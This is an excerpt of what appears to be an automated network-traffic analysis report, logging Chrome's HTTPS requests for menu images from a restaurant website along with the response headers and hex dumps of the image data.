                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:54 UTC4842INData Raw: 6b ac 56 17 b9 3e a7 e8 1d ea 21 a8 b4 30 11 54 7d 9f c7 37 6d c6 ed cd 73 39 bd 9d 87 1f 3a 89 ee ca 71 73 67 27 83 bb 6e 61 f9 ec 69 ce 1f 3b ce 9c 48 f1 9a 6f d2 b3 92 23 57 5e a6 6b 60 88 2d 5b 73 8c 0d f6 e3 f6 8c 30 a1 4f 31 fd a7 5f 20 b5 fd 10 d6 2d 37 20 90 d4 3b 86 a8 ac 9e a5 94 4b b3 82 4d df a2 06 1d 51 5f 5e 66 76 d2 47 1a 15 e4 98 45 67 ff 20 22 b5 85 7a f6 18 87 6e de 4d cf d0 cf 72 ec e4 17 a9 55 cb 84 a9 2a 1d 6e 17 af cd 7c 0d 4b 9d c5 d4 2e 41 23 e1 1d 13 9f e0 c0 f8 41 72 99 3c 5e d0 c4 f3 c3 6b ab aa 4a 5f ed 90 27 51 88 95 31 90 86 49 18 b4 b0 dd ec b6 b6 df 78 b3 f2 57 8a a2 ed ba 43 86 05 eb 03 8f 6d cb 15 d7 9c b3 db d3 4f 6f 57 81 6d 7d 26 27 12 f8 ce 95 0a f7 8c 64 c8 87 65 8a d9 14 d6 d4 32 71 7d 96 c2 d8 66 f6 5b 11 f2 c9 97
                                                                                                                                                    Data Ascii: kV>!0T}7ms9:qsg'nai;Ho#W^k`-[s0O1_ -7 ;KMQ_^fvGEg "znMrU*n|K.A#Ar<^kJ_'Q1IxWCmOoWm}&'de2q}f[


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    114192.168.2.449883162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:53 UTC408OUTGET /assets/imgs/menu_imges/Spicy_Battered_FishFillet.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:54 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:54 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 22:23:04 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 38060
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:54 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:54 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 56 08 06 00 00 00 4f 6a 81 79 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRZVOjypHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:54 UTC5644INData Raw: eb 97 59 6d 75 a8 2c 5c a3 60 84 6c bf ed 08 f9 f1 ed 34 66 2f 51 5d 59 20 4c 03 2a 2b f3 d8 99 3c fd fd 0a d9 ad 92 b4 33 cc cf cd f1 f1 17 3f 80 9b b3 39 bc ef 6e b6 6c d9 d5 d3 3d ac 0c 96 90 98 08 8c cd 33 d3 34 89 d0 69 82 61 b9 f8 dd 2e 96 65 4c d9 b6 71 93 5a 47 94 60 9a 6e d9 2b 14 c6 e2 24 c5 ca 14 58 bb 78 9c f5 8b cf e3 e4 07 f0 5b 55 54 d4 c6 f6 72 18 99 21 94 3d 80 74 4b e8 a4 4d 5c bf 4a d4 6d 92 c4 21 9d da 22 2b 0b d7 38 79 7a 96 8b 17 97 d8 d8 08 e8 34 22 96 ae 75 b1 27 77 d3 5d 68 f2 91 5f 7b 04 3b 9f c1 c8 d9 2c 9c 98 23 93 37 11 91 49 ce ca e2 65 0d e6 e6 57 d9 bb f3 ad 6c 9d b9 9d ce ca 32 8f 9d 0f 58 bc be c2 9d 93 26 aa 58 c4 54 2e 6b 2b 6d aa 7e c2 c2 e2 22 8b 17 8e 23 ba 1b 0c 0e 4d d1 ed 2a d6 ae 56 29 6d 39 c0 cc 81 ed 18 ae 20
                                                                                                                                                    Data Ascii: Ymu,\`l4f/Q]Y L*+<3?9nl=34ia.eLqZG`n+$Xx[UTr!=tKM\Jm!"+8yz4"u'w]h_{;,#7IeWl2X&XT.k+m~"#M*V)m9


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    115192.168.2.449881162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:53 UTC400OUTGET /assets/imgs/menu_imges/Cauliflower_Curry.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:54 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:54 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:10:26 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 36125
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:54 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:54 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 56 00 00 00 4b 08 06 00 00 00 ea 1e 70 b2 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRVKppHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:54 UTC3709INData Raw: 1c 7b 1e 6c 15 50 68 bb 9f 30 bb 84 a3 d3 d0 e9 8c a0 12 23 b8 9d c7 c9 0c bd 01 f3 a6 3f c0 9c f8 06 b3 23 dd 1c 2a ae a6 ab a3 89 36 12 28 a5 41 68 04 02 61 48 a4 61 a1 3d 1f 15 78 68 a5 91 86 89 eb f9 c8 a4 d3 19 73 9c 2e e0 e5 b3 02 b6 51 ad 75 5a 76 ac 5d ce 4d ce 20 a3 38 d6 04 6c db 20 88 c7 d1 7e 06 3b 59 c7 8a a7 20 68 e0 bb 1e 69 ed 91 78 dd 6f a0 66 9e 67 f8 c7 c7 99 d9 f7 d7 64 7b a0 30 73 80 fa f4 61 ca d3 51 69 e6 f2 0b 61 ed 12 f8 ec b7 e1 87 77 c2 a5 17 82 e7 c2 b3 77 c0 a6 13 8a df 58 11 0d 15 27 7b a0 a7 0d 62 d2 21 63 b8 dc b3 13 ee 7a 0e 62 35 28 1d 85 85 97 3d 43 7e 43 9a a6 1a a0 75 71 8c ae fe 61 46 4e 1d e2 e8 61 f0 8f 40 f7 cd 1b 60 70 1e d3 87 27 38 f1 f4 53 a8 eb 96 32 a5 56 23 be ff 7d 96 5c b0 13 63 e1 8d b8 db 8b 88 85 2f 60
                                                                                                                                                    Data Ascii: {lPh0#?#*6(AhaHa=xhs.QuZv]M 8l ~;Y hixofgd{0saQiawwX'{b!czb5(=C~CuqaFNa@`p'8S2V#}\c/`


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    116192.168.2.449882162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:53 UTC381OUTGET /assets/imgs/res_menu2.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:54 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:54 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 87549
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:54 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:54 UTC16031INData Raw: ff d8 ff e1 24 8a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 06 40 00 00 01 01 00 03 00 00 00 01 04 2c 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 31 32 3a 32 32 3a 32 32 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: $ExifMM*@,(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 12:22:22
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 65 cc 8f 56 ab 98 4b 4b 98 ef f0 98 f7 c6 ef 45 ff 00 a3 ff 00 ae 33 d4 57 4f b7 94 e9 bd 5d fe c6 a6 3c d2 c7 23 1b d0 24 c6 fa b5 87 99 8b 46 7e 2d db 45 95 b5 ee 6d 80 bf de 07 a7 6f e9 03 9a ff 00 73 bd 46 bd 96 7a 8b 1f a8 f4 7f 57 21 c1 b7 33 08 b5 bb f2 9c e0 d7 38 b3 f3 1c 18 e6 6d b3 dd fe 13 d4 ff 00 ad ad cf ab cf 77 42 c4 c7 fa b9 d4 0c 64 d0 c7 7d 9e f9 96 64 34 bd ef df 5b 9d ee ae df 7e d7 e3 d9 ff 00 4d 5e b6 9c 3c e6 3a a7 3f 6b b5 12 20 3c 7c 9c 3d df d4 55 f3 72 30 90 07 15 43 20 1a 5e b8 cf f5 78 65 f2 7f 55 b1 8b 9d c9 19 54 c9 94 3b fe 94 47 7f eb be 6b 83 8b 6e 23 0b 2e ad b6 e4 dc 2c 2c b1 f0 df d1 33 6c 3b d2 76 ef 45 d7 6d 73 bd df e8 fd 1f f4 8a 9d 16 64 f4 5e a7 4e 65 63 1d ed 01 e2 8b 83 0b 1a e6 9f 7b e8 35 bd f6 d5 e9 d9 ea
                                                                                                                                                    Data Ascii: eVKKE3WO]<#$F~-EmosFzW!38mwBd}d4[~M^<:?k <|=Ur0C ^xeUT;Gkn#.,,3l;vEmsd^Nec{5
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 4e 7b e0 18 31 b4 30 b0 18 77 bd 02 a8 35 eb bd 61 3b c4 1e 71 7c e0 18 4e b0 bb 03 f2 78 13 0c e5 85 ce 7c 87 0c ad af 93 c7 2d e7 2c 49 75 80 82 31 97 0a 9c 2a 73 8e 68 0c d8 f4 27 d3 f8 6c 38 d8 7d f0 ff 00 5f e1 bd db d9 bd 87 be 0f 43 ee be e3 df 13 07 b9 c6 cf fc 8e 26 1f 73 87 0e 0c 1e 95 fd f3 f8 38 7d cf ab 60 f6 cf ff da 00 08 01 03 00 01 05 00 6d 30 32 7e 3c 48 1c 86 89 03 16 36 72 a8 aa 24 04 02 48 c1 c8 97 5e 39 b6 c6 01 44 ca 77 8a 4e a2 3b 41 9f ca 9f 2c 41 c1 e3 26 d1 8b fc 41 21 b4 0e 7b 7f 82 b1 52 92 ef 07 b0 1e 37 9e 30 9d 61 38 49 cf 39 a0 17 63 91 3f 89 27 23 87 1b 5a 40 79 30 24 85 8c e1 f0 0f 11 8a cc 49 20 17 1b 0c 34 53 23 70 b8 b2 26 09 17 45 d7 3e 64 19 f3 2e 3c dc 97 fc 36 33 88 df f8 9c 1e f1 f9 c0 30 83 9a 50 0e b0 82 70 ec
                                                                                                                                                    Data Ascii: N{10w5a;q|Nx|-,Iu1*sh'l8}_C&s8}`m02~<H6r$H^9DwN;A,A&A!{R70a8I9c?'#Z@y0$I 4S#p&E>d.<630Pp
                                                                                                                                                    2024-10-01 04:26:54 UTC15252INData Raw: 00 b3 6f 9d 2f fd 53 63 ff 00 67 c3 fd 3f f2 4f 6f e1 bd cf b0 d7 c9 3f f4 9f ff 00 f2 47 f5 fe 32 4d 7f aa 8f 5c 61 f7 87 d9 70 7b 8f ee be e9 ec 73 f8 6c fe 1b 0f f6 fe 33 ff da 00 08 01 02 02 06 3f 00 64 e7 85 6e 5b 82 ad 06 e4 d8 9e 90 9e 4a ab 05 5a 2a 0c a1 51 36 29 bd 9a 01 da 8f 6a c1 3a ed 5d 89 c2 8b 6d a6 b0 24 9a 9a f8 53 92 4a 2c 19 f4 d5 55 38 d4 c1 f4 6f d4 24 ec 55 a2 72 47 b5 65 f7 ac c1 e8 85 0a 73 f0 c5 6e 7e 55 98 a6 8b b7 62 aa a1 60 02 63 b5 3e 80 43 2c 15 62 55 01 58 32 a9 8a 12 32 7b 76 6a 96 29 c8 a8 0c ad dc 9a 2f 64 86 be 1a 03 32 67 47 4b 94 23 8e fd 0c 70 54 26 aa 8b 7a 72 af 3c 72 c3 43 0c c5 39 aa 31 df 82 ae c4 16 18 6b d7 56 a1 32 7f 42 71 40 0a 68 d8 a9 a5 95 13 03 50 9f 4d 70 41 8d 13 62 9c 7f 72 75 40 9e 55 d2 c3 dc a9
                                                                                                                                                    Data Ascii: o/Scg?Oo?G2M\ap{sl3?dn[JZ*Q6)j:]m$SJ,U8o$UrGesn~Ub`c>C,bUX22{vj)/d2gGK#pT&zr<rC91kV2Bq@hPMpAbru@U
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 55 d2 83 03 33 f0 a3 9c b5 37 00 dc be bb b7 53 d0 ba 3f 32 e7 ab a3 76 c4 f3 bc 90 c4 ba 0f 5a 83 ed b9 71 fe 65 9a 07 54 8a 99 c3 a2 84 89 9c a6 bf 9c 57 f5 57 45 60 df 21 a9 fe 6a 18 61 44 c6 3d 15 82 e1 d1 59 e9 3b 66 86 f0 8f 35 67 e5 cf e4 f8 19 d6 22 a5 4c 1a 92 30 e9 d9 52 45 11 18 51 c7 1f 3d 78 60 33 2e 18 93 03 f0 d0 05 94 16 c1 54 11 33 e6 a3 e2 5c 0a c4 46 18 b7 e2 ad 4d c9 b5 cb 0c 86 4c fe 97 76 85 bb 4b a5 57 08 15 8f 91 7f 88 f2 2b 3c ca 8d 37 90 66 e0 70 3f a4 94 6d dc 52 8e b9 a9 ce ba 0d 05 b9 be 06 4a df a2 dd 4a 26 c9 2c 06 2c 87 8d 7f e6 db fb 4b 74 27 23 4b 1b 33 a9 d8 72 15 1b 68 13 5e 6a 18 d4 ec af de 0d a0 c1 a0 8b 33 17 46 3c 65 5b 73 e8 51 b8 bb ce 38 b5 48 2b dd d1 d4 ad 37 08 65 26 0a 88 d2 4d 15 8d d3 99 0d 89 f9 fa d5 16
                                                                                                                                                    Data Ascii: U37S?2vZqeTWWE`!jaD=Y;f5g"L0REQ=x`3.T3\FMLvKW+<7fp?mRJJ&,,Kt'#K3rh^j3F<e[sQ8H+7e&M
                                                                                                                                                    2024-10-01 04:26:54 UTC7114INData Raw: 39 7d 97 93 14 fa 7d 7b 3f b4 a1 07 1e 8a c6 7e 4a 9d 95 87 cc 6b 28 3d 15 b2 9e ca 91 16 00 41 f1 9d f6 a3 69 a2 45 c6 d5 06 73 d3 a7 7a bb 2a bd 63 8f e4 8a 6b ba 65 67 00 64 4f d1 e2 ab 9a 1b d6 e9 24 10 06 95 23 a2 9e df 31 0d 7a de f2 32 88 27 49 de c0 55 ae 60 8f 12 dd c5 f6 82 08 c7 79 bd 1d 17 3d dd 33 13 33 d6 1f 15 5a e5 e7 7e f5 c0 c0 74 ad be 26 fc ba 04 09 9f 9b e5 ab 60 28 c5 b3 e8 81 d5 a1 ce 32 86 bd 73 85 88 e1 1d ce cd 08 df b8 dc 16 c6 7e 95 ce c5 5c e4 bf 87 5c f0 f9 54 3a 39 ef e2 6b 94 75 b9 2f e1 7f a7 7b de 7b 4f 65 ed 13 94 e4 ed 8b 56 53 20 33 63 f5 97 5f de 5c 6a 7b f7 dc 5b b7 6c 6a 67 63 00 01 46 cd 92 6d ff 00 0f 43 ba 99 1b a4 7b db dd cf ab b5 f0 32 a9 23 1e 8a e9 6a c3 3a 9e b7 4d 46 46 b3 c6 ba 3c f5 31 3d 26 85 ee 59 b4
                                                                                                                                                    Data Ascii: 9}}{?~Jk(=AiEsz*ckegdO$#1z2'IU`y=33Z~t&`(2s~\\T:9ku/{{OeVS 3c_\j{[ljgcFmC{2#j:MFF<1=&Y


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    117192.168.2.449884162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:53 UTC380OUTGET /assets/imgs/res_menu.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:54 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:54 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 189380
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:54 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:54 UTC16030INData Raw: ff d8 ff e1 34 5d 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 04 cb 00 00 01 01 00 03 00 00 00 01 03 b5 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 31 35 3a 32 38 3a 34 32 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: 4]ExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 15:28:42
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 84 c3 d3 75 e3 f3 46 27 94 a4 85 b4 95 c4 d4 e4 f4 a5 b5 c5 d5 e5 f5 56 66 76 86 96 a6 b6 c6 d6 e6 f6 37 47 57 67 77 87 97 a7 b7 c7 d7 e7 f7 11 00 02 02 01 02 04 04 03 04 05 06 07 07 06 05 35 01 00 02 11 03 21 31 12 04 41 51 61 71 22 13 05 32 81 91 14 a1 b1 42 23 c1 52 d1 f0 33 24 62 e1 72 82 92 43 53 15 63 73 34 f1 25 06 16 a2 b2 83 07 26 35 c2 d2 44 93 54 a3 17 64 45 55 36 74 65 e2 f2 b3 84 c3 d3 75 e3 f3 46 94 a4 85 b4 95 c4 d4 e4 f4 a5 b5 c5 d5 e5 f5 56 66 76 86 96 a6 b6 c6 d6 e6 f6 27 37 47 57 67 77 87 97 a7 b7 c7 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 a5 f5 4e 9a 3a 00 c8 66 55 8f b0 65 b1 be a9 63 65 8d 7d 67 7d 2e ae bf e7 6c fa 56 d7 bf fe 13 f9 b5 d2 d1 d7 70 f2 40 67 4d a7 27 a9 58 3e 90 a6 97 56 c6 69 ff 00 6a 72 73 fe c7 8f 8f ff 00 6e 58
                                                                                                                                                    Data Ascii: uF'Vfv7GWgw5!1AQaq"2B#R3$brCScs4%&5DTdEU6teuFVfv'7GWgw?N:fUece}g}.lVp@gM'X>VijrsnX
